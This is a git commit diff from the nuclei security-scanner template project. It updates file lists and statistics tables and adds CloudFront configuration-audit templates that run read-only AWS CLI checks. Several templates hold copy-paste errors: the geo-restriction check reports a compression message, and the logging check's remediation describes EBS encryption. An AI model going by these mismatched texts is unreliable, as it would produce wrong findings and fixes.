Merge branch 'main' into main
commit
6ac3899944
137
.new-additions
137
.new-additions
|
@ -1,116 +1,23 @@
|
||||||
cloud/aws/dms/dms-multi-az.yaml
|
cloud/aws/cloudfront/cloudfront-compress-object.yaml
|
||||||
cloud/aws/dms/dms-public-access.yaml
|
cloud/aws/cloudfront/cloudfront-custom-certificates.yaml
|
||||||
cloud/aws/dms/dms-version-upgrade.yaml
|
cloud/aws/cloudfront/cloudfront-geo-restriction.yaml
|
||||||
cloud/aws/ebs/ebs-encryption-disabled.yaml
|
cloud/aws/cloudfront/cloudfront-insecure-protocol.yaml
|
||||||
cloud/aws/efs/efs-encryption-disabled.yaml
|
cloud/aws/cloudfront/cloudfront-integrated-waf.yaml
|
||||||
cloud/aws/elasticache/cache-automatic-backups-disabled.yaml
|
cloud/aws/cloudfront/cloudfront-logging-disabled.yaml
|
||||||
cloud/aws/elasticache/cache-event-notification-disabled.yaml
|
cloud/aws/cloudfront/cloudfront-origin-shield.yaml
|
||||||
cloud/aws/elasticache/cache-redis-encryption-disabled.yaml
|
cloud/aws/cloudfront/cloudfront-security-policy.yaml
|
||||||
cloud/aws/elasticache/cache-redis-multiaz-disabled.yaml
|
cloud/aws/cloudfront/cloudfront-traffic-unencrypted.yaml
|
||||||
cloud/aws/firehose/firehose-server-destination-encryption.yaml
|
cloud/aws/cloudfront/cloudfront-viewer-policy.yaml
|
||||||
cloud/aws/firehose/firehose-server-side-encryption.yaml
|
code/cves/2014/CVE-2014-0160.yaml
|
||||||
cloud/aws/guardduty/guardduty-findings.yaml
|
http/cves/2019/CVE-2019-1003000.yaml
|
||||||
cloud/aws/guardduty/guardduty-not-enabled.yaml
|
http/cves/2024/CVE-2024-4841.yaml
|
||||||
cloud/aws/guardduty/malware-protection-disabled.yaml
|
http/cves/2024/CVE-2024-6420.yaml
|
||||||
cloud/aws/guardduty/s3-protection-disabled.yaml
|
http/exposed-panels/cyberpanel-panel.yaml
|
||||||
cloud/aws/inspector2/inspector2-disabled.yaml
|
http/exposed-panels/quivr-panel.yaml
|
||||||
cloud/aws/rds/rds-auto-minor-upgrade-disabled.yaml
|
http/iot/ip-webcam.yaml
|
||||||
cloud/aws/rds/rds-automated-backup-disabled.yaml
|
http/miscellaneous/azure-blob-core-detect.yaml
|
||||||
cloud/aws/rds/rds-backtrack-disabled.yaml
|
http/technologies/hubble-detect.yaml
|
||||||
cloud/aws/rds/rds-cluster-protection-disabled.yaml
|
http/technologies/localai-detect.yaml
|
||||||
cloud/aws/rds/rds-copy-snap.yaml
|
http/technologies/pghero-detect.yaml
|
||||||
cloud/aws/rds/rds-insights-disabled.yaml
|
|
||||||
cloud/aws/rds/rds-instance-autoscaling-disabled.yaml
|
|
||||||
cloud/aws/rds/rds-log-export-disabled.yaml
|
|
||||||
cloud/aws/rds/rds-multi-az.yaml
|
|
||||||
cloud/aws/rds/rds-public-access.yaml
|
|
||||||
cloud/aws/route53/route53-dns-query-disabled.yaml
|
|
||||||
cloud/aws/route53/route53-dnssec-signing-disabled.yaml
|
|
||||||
dast/cves/2024/CVE-2024-2961.yaml
|
|
||||||
http/cnvd/2024/CNVD-2024-38747.yaml
|
|
||||||
http/cves/2015/CVE-2015-8562.yaml
|
|
||||||
http/cves/2017/CVE-2017-5868.yaml
|
|
||||||
http/cves/2018/CVE-2018-7192.yaml
|
|
||||||
http/cves/2018/CVE-2018-7193.yaml
|
|
||||||
http/cves/2018/CVE-2018-7196.yaml
|
|
||||||
http/cves/2019/CVE-2019-8943.yaml
|
|
||||||
http/cves/2021/CVE-2021-38156.yaml
|
|
||||||
http/cves/2021/CVE-2021-45811.yaml
|
|
||||||
http/cves/2023/CVE-2023-1315.yaml
|
|
||||||
http/cves/2023/CVE-2023-1317.yaml
|
|
||||||
http/cves/2023/CVE-2023-1318.yaml
|
|
||||||
http/cves/2023/CVE-2023-2745.yaml
|
|
||||||
http/cves/2023/CVE-2023-38040.yaml
|
|
||||||
http/cves/2023/CVE-2023-39560.yaml
|
|
||||||
http/cves/2023/CVE-2023-40748.yaml
|
|
||||||
http/cves/2023/CVE-2023-40749.yaml
|
|
||||||
http/cves/2023/CVE-2023-40750.yaml
|
|
||||||
http/cves/2023/CVE-2023-40751.yaml
|
|
||||||
http/cves/2023/CVE-2023-40752.yaml
|
|
||||||
http/cves/2023/CVE-2023-40753.yaml
|
|
||||||
http/cves/2023/CVE-2023-40755.yaml
|
|
||||||
http/cves/2023/CVE-2023-40931.yaml
|
|
||||||
http/cves/2023/CVE-2023-43373.yaml
|
|
||||||
http/cves/2023/CVE-2023-5558.yaml
|
|
||||||
http/cves/2023/CVE-2023-5561.yaml
|
|
||||||
http/cves/2024/CVE-2016-9299.yaml
|
|
||||||
http/cves/2024/CVE-2024-22476.yaml
|
|
||||||
http/cves/2024/CVE-2024-32735.yaml
|
|
||||||
http/cves/2024/CVE-2024-32736.yaml
|
|
||||||
http/cves/2024/CVE-2024-32737.yaml
|
|
||||||
http/cves/2024/CVE-2024-32738.yaml
|
|
||||||
http/cves/2024/CVE-2024-32739.yaml
|
|
||||||
http/cves/2024/CVE-2024-35584.yaml
|
|
||||||
http/cves/2024/CVE-2024-3656.yaml
|
|
||||||
http/cves/2024/CVE-2024-39713.yaml
|
|
||||||
http/cves/2024/CVE-2024-43360.yaml
|
|
||||||
http/cves/2024/CVE-2024-44349.yaml
|
|
||||||
http/cves/2024/CVE-2024-4439.yaml
|
|
||||||
http/cves/2024/CVE-2024-45488.yaml
|
|
||||||
http/cves/2024/CVE-2024-46310.yaml
|
|
||||||
http/cves/2024/CVE-2024-48914.yaml
|
|
||||||
http/cves/2024/CVE-2024-49757.yaml
|
|
||||||
http/cves/2024/CVE-2024-5910.yaml
|
|
||||||
http/cves/2024/CVE-2024-8698.yaml
|
|
||||||
http/cves/2024/CVE-2024-9061.yaml
|
|
||||||
http/cves/2024/CVE-2024-9234.yaml
|
|
||||||
http/cves/2024/CVE-2024-9593.yaml
|
|
||||||
http/cves/2024/CVE-2024-9617.yaml
|
|
||||||
http/cves/2024/CVE-2024-9796.yaml
|
|
||||||
http/default-logins/apache/doris-default-login.yaml
|
|
||||||
http/default-logins/sato/sato-default-login.yaml
|
|
||||||
http/default-logins/zebra/zebra-printer-default-login.yaml
|
|
||||||
http/exposed-panels/1password-scim-panel.yaml
|
|
||||||
http/exposed-panels/danswer-panel.yaml
|
|
||||||
http/exposed-panels/freescout-panel.yaml
|
|
||||||
http/exposed-panels/nagios/nagios-logserver-panel.yaml
|
|
||||||
http/exposed-panels/olympic-panel.yaml
|
|
||||||
http/exposed-panels/onedev-panel.yaml
|
|
||||||
http/exposed-panels/paloalto-expedition-panel.yaml
|
|
||||||
http/exposed-panels/reolink-panel.yaml
|
|
||||||
http/exposed-panels/sqlpad-panel.yaml
|
|
||||||
http/exposed-panels/traccar-panel.yaml
|
|
||||||
http/exposed-panels/txadmin-panel.yaml
|
|
||||||
http/exposed-panels/usermin-panel.yaml
|
|
||||||
http/exposed-panels/veritas-netbackup-panel.yaml
|
|
||||||
http/exposed-panels/vmware-aria-panel.yaml
|
|
||||||
http/misconfiguration/installer/nagios-logserver-installer.yaml
|
|
||||||
http/misconfiguration/redpanda-console.yaml
|
|
||||||
http/misconfiguration/root-path-disclosure.yaml
|
|
||||||
http/misconfiguration/unauth-cyber-power-systems.yaml
|
|
||||||
http/takeovers/wasabi-bucket-takeover.yaml
|
|
||||||
http/technologies/accellion-detect.yaml
|
|
||||||
http/technologies/gradio-detect.yaml
|
|
||||||
http/technologies/lollms-webui-detect.yaml
|
|
||||||
http/technologies/mirth-connect-detect.yaml
|
|
||||||
http/technologies/oracle-fusion-detect.yaml
|
|
||||||
http/technologies/salesforce-b2c-commerce-webdav.yaml
|
|
||||||
http/technologies/wordpress/plugins/burst-statistics.yaml
|
http/technologies/wordpress/plugins/burst-statistics.yaml
|
||||||
http/vulnerabilities/hcm/hcm-cloud-lfi.yaml
|
http/vulnerabilities/backdoor/lottie-backdoor.yaml
|
||||||
http/vulnerabilities/nagios/nagios-xi-xss.yaml
|
|
||||||
http/vulnerabilities/other/cyberpanel-rce.yaml
|
|
||||||
http/vulnerabilities/wordpress/application-pass-xss.yaml
|
|
||||||
http/vulnerabilities/wordpress/wp-footnote-xss.yaml
|
|
||||||
http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml
|
|
||||||
http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
|
|
||||||
passive/cves/2024/CVE-2024-40711.yaml
|
|
||||||
|
|
20
README.md
20
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
|
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
|
||||||
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
|
| cve | 2824 | dhiyaneshdk | 1456 | http | 8128 | info | 3910 | file | 402 |
|
||||||
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
|
| panel | 1225 | daffainfo | 866 | file | 402 | high | 2069 | dns | 25 |
|
||||||
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
|
| wordpress | 1057 | dwisiswant0 | 802 | cloud | 353 | medium | 1784 | | |
|
||||||
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
|
| exposure | 999 | princechaddha | 498 | workflows | 192 | critical | 1175 | | |
|
||||||
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
|
| xss | 975 | ritikchaddha | 479 | network | 137 | low | 284 | | |
|
||||||
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
|
| wp-plugin | 920 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
|
||||||
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
|
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
|
||||||
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
|
| tech | 736 | pdteam | 302 | ssl | 30 | | | | |
|
||||||
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
|
| misconfig | 718 | ricardomaia | 243 | dast | 26 | | | | |
|
||||||
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |
|
| lfi | 716 | geeknik | 231 | dns | 22 | | | | |
|
||||||
|
|
||||||
**723 directories, 9654 files**.
|
**736 directories, 9771 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
File diff suppressed because one or more lines are too long
11774
TEMPLATES-STATS.md
11774
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
18
TOP-10.md
18
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
|
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
|
||||||
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
|
| cve | 2824 | dhiyaneshdk | 1456 | http | 8128 | info | 3910 | file | 402 |
|
||||||
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
|
| panel | 1225 | daffainfo | 866 | file | 402 | high | 2069 | dns | 25 |
|
||||||
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
|
| wordpress | 1057 | dwisiswant0 | 802 | cloud | 353 | medium | 1784 | | |
|
||||||
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
|
| exposure | 999 | princechaddha | 498 | workflows | 192 | critical | 1175 | | |
|
||||||
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
|
| xss | 975 | ritikchaddha | 479 | network | 137 | low | 284 | | |
|
||||||
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
|
| wp-plugin | 920 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
|
||||||
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
|
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
|
||||||
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
|
| tech | 736 | pdteam | 302 | ssl | 30 | | | | |
|
||||||
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
|
| misconfig | 718 | ricardomaia | 243 | dast | 26 | | | | |
|
||||||
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |
|
| lfi | 716 | geeknik | 231 | dns | 22 | | | | |
|
||||||
|
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: cloudfront-compress-object
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CloudFront Compress Objects Automatically
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
description: |
|
||||||
|
Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are configured to automatically compress content for web requests that include "Accept-Encoding: gzip" in the request header, in order to increase the websites/web applications performance and reduce bandwidth costs.
|
||||||
|
impact: |
|
||||||
|
Disabling "Compress Objects Automatically" in CloudFront can lead to increased data transfer costs and slower page load times, negatively impacting user experience and performance.
|
||||||
|
remediation: |
|
||||||
|
Enable "Compress Objects Automatically" in CloudFront to reduce data transfer sizes, enhance loading speeds, and improve overall performance for end users.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/compress-objects-automatically.html
|
||||||
|
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/ServingCompressedFiles.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].Compress' --region $region --output text
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "False"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
|
||||||
|
# digest: 490a00463044022049dd48306c6c158a96f198e145cc789b3470759ea27f11f4eee8dcbcd1a02782022063234ed30fb1eb259bddcc79bef550ca731a8923594dadb47ae744ddceb508cf:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: cloudfront-custom-certificates
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cloudfront Custom SSL/TLS Certificates - In Use
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Ensure that your Amazon CloudFront distributions are configured to use a custom SSL/TLS certificate instead of the default one.
|
||||||
|
impact: |
|
||||||
|
Failing to use custom SSL/TLS certificates in CloudFront can result in trust issues with end users, exposing your web content to man-in-the-middle attacks and potentially damaging your brand's reputation due to untrusted connection warnings.
|
||||||
|
remediation: |
|
||||||
|
Configure your Amazon CloudFront distribution to use custom SSL/TLS certificates to ensure secure and trusted connections for your users, enhancing data protection and maintaining brand integrity.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-distro-custom-tls.html
|
||||||
|
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/CNAMEs.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution --region $region --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.CloudFrontDefaultCertificate' --output text
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "False"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"Cloudfront Custom SSL/TLS Certificates " + distribution + " In Use"'
|
||||||
|
# digest: 4a0a00473045022100da635117b120204e1672952e41f6ee3ed6dabf0747f609179b0f67d5a69d075b02205b7689dcdc0580def61f7365313c333d14cab3be5e87ced20955c329501c674d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: cloudfront-geo-restriction
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CloudFront Geo Restriction - Not Enabled
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Ensure that geographic restriction is enabled for your Amazon CloudFront CDN distributions in order to allow or block viewers from specific locations (countries) from accessing your web content.
|
||||||
|
impact: |
|
||||||
|
Not enabling Geo Restriction in CloudFront exposes content to users from unauthorized regions, increasing the risk of content misuse, compliance violations, and potential security threats.
|
||||||
|
remediation: |
|
||||||
|
Enable Geo Restriction in CloudFront to control access to content based on geographic locations, ensuring only authorized users from designated regions can access specific resources.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/geo-restriction.html
|
||||||
|
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/georestrictions.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution-config --id $distribution --query "DistributionConfig.Restrictions.GeoRestriction.RestrictionType" --region $region --output text
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "none"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
|
||||||
|
# digest: 4a0a004730450220142b520c987e8f2bcfdf0ae5bac12ebf324e825707c1ddd75291b2ff70b53f39022100ec5ac177b54af99c6215cf891d48ad55e8e7fead07e40e32ecbf13085ca6bf09:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: cloudfront-insecure-protocol
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CloudFront Insecure Origin SSL Protocols
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are not using insecure SSL protocols (i.e. SSLv3) for HTTPS communication between CloudFront edge locations and custom origins.
|
||||||
|
impact: |
|
||||||
|
Insecure SSL protocols for CloudFront origins can expose sensitive data to interception and compromise, increasing the risk of man-in-the-middle attacks.
|
||||||
|
remediation: |
|
||||||
|
Configure your CloudFront distribution to enforce the use of secure SSL/TLS protocols (TLS 1.2 or higher) for all origins and disable support for outdated protocols like SSLv3 and TLS 1.0/1.1.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-insecure-origin-ssl-protocols.html
|
||||||
|
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginSslProtocols.Items | []' --region $region --output json
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "SSLv3"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"CloudFront Uses SSLv3 Protocol in" + distribution'
|
||||||
|
# digest: 4b0a00483046022100fdc0ce1c8723e90fb04a9afeefa22c4a2688c89157b4f1c5c6be4a243dcf9213022100d12140b15551ef3d20a7877e4e31b370371ab0d4127a3bb56b53a6363387acd9:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,67 @@
|
||||||
|
id: cloudfront-integrated-waf
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CloudFront Integrated With WAF
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Ensure that all your Amazon CloudFront distributions are integrated with the Amazon Web Application Firewall (WAF) service to protect against application-layer attacks that can compromise the security of your websites/web applications or place unnecessary load on them
|
||||||
|
impact: |
|
||||||
|
Lack of integration between CloudFront and a Web Application Firewall (WAF) increases vulnerability to web-based attacks, including DDoS, SQL injection, and cross-site scripting (XSS).
|
||||||
|
remediation: |
|
||||||
|
Integrate CloudFront with an appropriate Web Application Firewall (WAF) to filter and monitor HTTP requests, providing enhanced protection against common web threats.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-integrated-with-waf.html
|
||||||
|
- http://docs.aws.amazon.com/waf/latest/developerguide/what-is-aws-waf.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.WebACLId' --region $region --output json
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '""'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'arn:'
|
||||||
|
negative: true
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"CloudFront Integrated With WAF " + distribution + " is Disabled"'
|
||||||
|
# digest: 4a0a00473045022100a36dcab2a207e696447d68b0dce85fe832262f87ce1b46b55dedec2d0d1211c902206af51e44f15794e01470f3e31dae926ca281d793cb43438e67acfa8bfa8b3525:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: cloudfront-logging-disabled
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cloudfront Logging Disabled
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Ensure that access (standard) logging is enabled for your Amazon CloudFront distributions in order to track all viewer requests for the web content delivered through the Content Delivery Network (CDN).
|
||||||
|
impact: |
|
||||||
|
Disabling CloudFront logging reduces visibility into traffic patterns, hinders incident response and forensic analysis, compromises compliance efforts, and limits troubleshooting capabilities, increasing security risks.
|
||||||
|
remediation: |
|
||||||
|
Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-logging-enabled.html
|
||||||
|
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/AccessLogs.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Logging.Enabled' --region $region --output text
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "False"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"Cloudfront Logging " + distribution + " is Disabled"'
|
||||||
|
# digest: 4a0a0047304502206dc958b5b8b2f929d7f5416fe53425745b6f54d4d8d2c929f92aa508189202aa0221008b22fee11b75ecdf6da6c22803d8a6b55552f8be2910f60ce5dccf686fb892b8:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: cloudfront-origin-shield
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CloudFront Origin Shield - Not Enabled
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Ensure that the Origin Shield performance optimization feature is enabled for all your Amazon CloudFront distributions in order to help reduce the load on your distribution's origin, improve its availability, and reduce its operating costs.
|
||||||
|
impact: |
|
